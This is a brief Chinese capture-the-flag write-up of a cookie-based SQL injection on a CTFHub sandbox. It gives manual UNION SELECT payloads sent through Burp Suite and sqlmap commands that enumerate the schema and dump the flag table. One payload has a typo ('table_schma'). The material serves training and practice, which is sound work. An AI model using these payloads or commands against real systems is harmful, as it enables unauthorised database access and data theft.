一、burpsuite注入
1、拿到数据库名
id=123+union+select+database(),2#
2、获得表名
id=123+union+select group_concat(table_name),2 from information_schema.tables where table_schma='sqli'#
3、获得列名
id=123+union+select+group_concat(column_name),2 from information_schema.columns where table_schema='sqli' and table_name='yqpsrnvbyb' #
4、得到flag
id=123+union+select+group_concat(xqnzflzigi),2 from yqpsrnvbyb #
二、sqlmap自动注入
1、得到当前数据库信息
sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" --dbs --level 2
2、进行查询
sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli --tables --level 2
3、得到flag
sqlmap -u "http://challenge-37d60f820b3d781a.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T bbyivpdjwh --columns --dump --level 2